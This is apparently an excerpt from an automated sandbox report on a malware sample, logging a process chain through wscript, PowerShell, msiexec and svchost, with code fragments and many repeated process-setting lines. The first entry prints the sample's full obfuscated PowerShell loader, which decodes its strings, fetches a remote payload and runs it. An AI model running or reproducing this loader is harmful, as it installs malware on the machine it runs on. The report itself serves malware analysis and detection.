                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Blodudtrdningen='Afhndede';;$noncooperator='Cryophorus';;$Thalassinian='Josephina';;$Maste193='Forslvendes';;$Downthrust=$host.Name; function Symboltabeller($blowtube){If ($Downthrust) {$Morphogenic='Ukammerater';$overstegne=2;$Smugleriernes=$overstegne}do{$Usaglige+=$blowtube[$Smugleriernes];$Smugleriernes+=3} until(!$blowtube[$Smugleriernes])$Usaglige}function cleavingly($Ethnicon){ .($Gudmors) ($Ethnicon)}$Medioanterior=Symboltabeller 'ben EExtTw.F W';$Medioanterior+=Symboltabeller 'ReeUnbLacb,lO,i keBrn FT';$Forstdelsernes=Symboltabeller 'RyM Ro Dz.riOpl,alDeaAm/';$Udlodning=Symboltabeller 'P T.klBls F1Se2';$Rival='N [,in Be STTr.FjSasE MRGivmoISaCNeE MPBeO CIBoNAnTTiME a lnEdApaGDoEcor,l] : D: Ss eMoc u KrS i TtSaYFoPB.R SO t po BCKlO,rlF =Vu$ US DDuld Oped eN,eI dNNiG';$Forstdelsernes+=Symboltabeller 'Mo5S .No0Mo t(TiWImi.on Pd oAvwDosO. lyNChTF. p1 e0Me.Af0K,;Ap CoWT iMinSn6 4F ; Unx,a6 u4Ac; l FarGrvGa:.e1ab3U 1In.S 0 F)La LoGU,e KcHokIno l/.u2Sh0 e1Un0Ha0me1 f0Sa1 i KeFIdi ArGre rf Jo nx L/T 1,a3Ac1Ca. ,0';$Hoejkulturer=Symboltabeller ' DUansGnEB RTi- AUdg ,E oN .t';$Eliksirers=Symboltabeller '.oh pt tc,pAnsPl:fe/Ni/ChwInw hwD . atUndSkeSij .bDe.Chc ho Am ./Exew fSk/ STokPriSlf tP eP r nn xeT .ScsChe ea E>Unh FtD,t Np she:Fl/.l/,iw SwBew .O a,krGeeMrcseo ksA aFolaud GaGatAnu SrMie,e.Spi Kt ./ SeEnfPf/ RS.ekEtiInfSutMeeH.r,anAmeAd.V sAne Ia';$Programmeringsskik1=Symboltabeller 'A >';$Gudmors=Symboltabeller ' BIC eH x';$Strudsmaven='Circumscript';$Fastprissystemet='\Even.Lar';cleavingly (Symboltabeller '.a$EsGA.LEpOArbLaaKaL e: ai GoVeD fi Sn .ETrs B=A,$StEBrNU vAp:EmaB pMaPMedC a TT aGu+S $ FE,ABes TSepSirFoiges.es,uYTis.mT teO mS.EK,t');cleavingly (Symboltabeller ' C$anG oLKvOHaBRoa LKv:SpVK A .aPabLoeReNBoFRuATeBDeR AiStKDy=Pr$ rESolazI dKT,S kISkRUnE .R FSCh.SaSnePPrLOpiTetRa( a$AnPSyr rOUbGVirFuaViM.aMSkeFor ei oND.G WSM sR kPriHekTe1 ,)');cleavingly (Symboltabeller $Rival);$Eliksirers=$Vaabenfabrik[0];$portor=(Symboltabeller 'Re$PrG,tLNeoW,BS.AP lF,:.aAFrTDiENol I ,e kR .v eiDeN FdWhUmeER = aNU eNyWIn- koTrbStj,yEBrcMiTDe BesRyy oS.ttr.eA mKa. i$ Bm leLyd SIRaoUlApenA.T eeDir itho r');cleavingly ($portor);cleavingly (Symboltabeller 'S $.iaVitBaeMilMiitoeWirInvEgiUnnTidDuuPae e. HS eS a dpreScr ,s S[Wu$VrHRuo,pe jH,kscu ul ktHyuenrU eD r e].r=An$PlFP oBirPasAdtKad.be ElBisA eNerL nTeeFus');$Pastina=Symboltabeller 'Ve$Sea etT,e ll oi,oeMirRuvKaiMin TdOpu aeSk. fD Uo wOpn Cl,ioDeaL d KF,ei el SeD (Bo$SaEFel li,ikNas Ei nr DeCorBesbe,In$ SBotFieM.mFin Pi bnDdg osH.fApu PlLedObtOt)';$Stemningsfuldt=$Iodines;cleavingly (Symboltabeller 'Sm$ AGK.lAnOC,bG.A.rl u:AfW IeMoe ukMdeChN eD HUS DseFAal,ru gRetUnEHar Tn fe IS t= E(erTC E SUnTp -Alp rAO,TFohC Vi$,rS nTKie SM Bn aIUnnEggFis.oFwaur LAfd T.a)');while (!$Weekendudflugternes) {cleavingly (Symboltabeller ' G$GegHelB,o ,b a KlAn:TrF,no DeJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD342300BD pushad ; iretd 5_2_00007FFD342300C1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD342332FA push eax; retf 5_2_00007FFD34233321
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD343090F8 push eax; iretd 5_2_00007FFD343090F9
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_07841CB4 pushfd ; ret 12_2_07841CBD
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_09363975 push ebx; retf 12_2_09363995
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_09366368 push ds; ret 12_2_09366369
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_0936CF44 push eax; ret 12_2_0936CF4A
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_093663AE push 0000001Ch; iretd 12_2_093663B0
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_0936418C push FFFFFFF9h; retf 12_2_09364192
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_0936CDE6 push edx; retf 12_2_0936CDE8
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_093639E5 push ebx; retf 12_2_09363995
                        Source: C:\Windows\SysWOW64\msiexec.exeCode function: 19_3_03A663AE push 0000001Ch; iretd 19_3_03A663B0
                        Source: C:\Windows\SysWOW64\msiexec.exeCode function: 19_3_03A6418C push FFFFFFF9h; retf 19_3_03A64192
                        Source: C:\Windows\SysWOW64\msiexec.exeCode function: 19_3_03A6CDE6 push edx; retf 19_3_03A6CDE8
                        Source: C:\Windows\SysWOW64\msiexec.exeCode function: 19_3_03A639E5 push ebx; retf 19_3_03A63995
                        Source: C:\Windows\SysWOW64\msiexec.exeCode function: 19_3_03A66368 push ds; ret 19_3_03A66369
                        Source: C:\Windows\SysWOW64\msiexec.exeCode function: 19_3_03A63975 push ebx; retf 19_3_03A63995
                        Source: C:\Windows\SysWOW64\msiexec.exeCode function: 19_3_03A6CF44 push eax; ret 19_3_03A6CF4A
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_3_007C225D push eax; ret 22_3_007C225F
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_3_007C6012 push 00000038h; iretd 22_3_007C601D
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_3_007C5606 pushad ; retf 22_3_007C5619
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_3_007C28ED push ebx; ret 22_3_007C28E4
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_3_007C18C0 push ebp; retf 22_3_007C18C1
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_3_007C58BC pushad ; ret 22_3_007C58C1
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_3_007C588E push eax; iretd 22_3_007C589D
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_3_007C1179 push FFFFFF82h; iretd 22_3_007C117B
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_3_007C4920 push 0000002Eh; iretd 22_3_007C4922
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_3_007C5F0C push es; iretd 22_3_007C5F0D
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_3_007C5FEE push FFFFFFD2h; retf 22_3_007C6011
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_3_007C0FEA push eax; ret 22_3_007C0FF5
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_3_007C278B push ebx; ret 22_3_007C28E4
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
